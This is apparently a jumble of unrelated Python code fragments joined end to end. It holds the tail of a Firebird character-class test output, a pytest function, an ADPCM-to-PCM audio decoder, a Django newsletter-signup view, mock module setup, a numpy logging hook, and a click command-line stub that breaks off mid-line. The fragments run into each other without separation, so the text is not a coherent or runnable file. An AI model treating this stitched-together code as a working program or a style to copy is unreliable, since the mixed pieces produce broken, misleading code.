S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C o S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C u S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C y S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C A S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C E S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C I S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C O S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C U S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C Y S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C á S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C é S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C í S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ó S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ú S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ý S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C à S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C è S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ì S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ò S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ù S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C â S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ê S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C î S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ô S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C û S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ã S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ñ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C õ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ä S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ë S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ï S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ö S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ü S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ÿ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ç S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C š S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ą S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ę S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ź S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ż S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ă S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ş S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ţ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Á S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C É S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Í S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ó S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ú S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ý S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C À S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C È S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ì S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ò S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ù S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Â S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ê S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Î S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ô S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Û S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ã S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ñ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Õ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ä S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ë S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ï S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ö S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ü S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ÿ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ç S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Š S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ą S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ę S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ź S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ż S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ă S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ş S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ţ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 1 C S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 1 C \\w S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 1 C ø S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ð S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ł S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ŀ S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ø S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ð S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ł S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ŀ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 """ @pytest.mark.version('>=4.0') def test_2(act_2: Action): act_2.expected_stdout = expected_stdout_2 act_2.execute() assert act_2.clean_stdout == act_2.clean_expected_stdout import struct indexTable= [-1,-1,-1,-1,2,4,6,8] stepsizeTable = [7, 8, 9, 10, 11, 12, 13, 14, 16, 17, 19, 21, 23, 25, 28, 31, 34, 37, 41, 45, 50, 55, 60, 66, 73, 80, 88, 97, 107, 118, 130, 143, 157, 173, 190, 209, 230, 253, 279, 307, 337, 371, 408, 449, 494, 544, 598, 658, 724, 796, 876, 963, 1060, 1166, 1282, 1411, 1552, 1707, 1878, 2066, 2272, 2499, 2749, 3024, 3327, 3660, 4026, 4428, 4871, 5358, 5894, 6484, 7132, 7845, 8630, 9493, 10442, 11487, 12635, 13899, 15289, 16818, 18500, 20350, 22385, 24623, 27086, 29794, 32767] index = 0 cur_sample = 0 #input code 4bit, return output 16 bit sample def adpcm2pcm(code): global index global cur_sample global indexTable global stepsizeTable if ((code & 8) != 0): fg = 1 else: fg = 0 code &= 7 diff = int((stepsizeTable[index]*code/4) + stepsizeTable[index]/8) if fg: diff = -diff cur_sample += diff #check overflow if cur_sample > 32767: cur_sample = 32767 elif cur_sample < -32768: cur_sample = -32768 index += indexTable[code] # check overflow if index < 0: index = 0 elif index > 88: index = 88 return struct.pack('h',cur_sample) if __name__ == '__main__': try: f = open('adpcm','rb') s = open('pcm','wb') tmp = f.read(1) while tmp: sample=ord(tmp) #transfer to int high_bit = sample >> 4 low_bit = (high_bit << 4)^sample s.write(adpcm2pcm(high_bit)) s.write(adpcm2pcm(low_bit)) tmp = f.read(1) f.close() s.close() except: print("fail") print("done")from django.conf import settings from django.contrib import messages from django.http import HttpResponseRedirect from django.shortcuts import render from .forms import EmailSignupForm from .models import EmailSignup def email_list_signup(request): form = EmailSignupForm(request.POST or None) if request.method == "POST": if form.is_valid(): email_signup_qs = EmailSignup.objects.filter(email=form.instance.email) if email_signup_qs.exists(): messages.info(request, "You are already subscribed") else: form.save() messages.success(request, "You are successfully subscribed") return HttpResponseRedirect(request.META.get('HTTP_REFERER')) import sys sys.modules['custom_exceptions'] = __import__('mock_custom_exceptions') sys.modules['utility'] = __import__('mock_utility') sys.modules['constants'] = __import__('mock_constants')import numpy from aspectizing import any_callable, aspect, woody_logger aspect(numpy, any_callable, "", woody_logger, dry_run=True) cloud_formation_viz/main.py #!/usr/bin/env python import sys import click from .parser import cfn_parser from .render import write_output @click.command() @click.argument("input", type=click.File("r"), default=sys.stdin) @click.argument('output', type=click.File('w'), 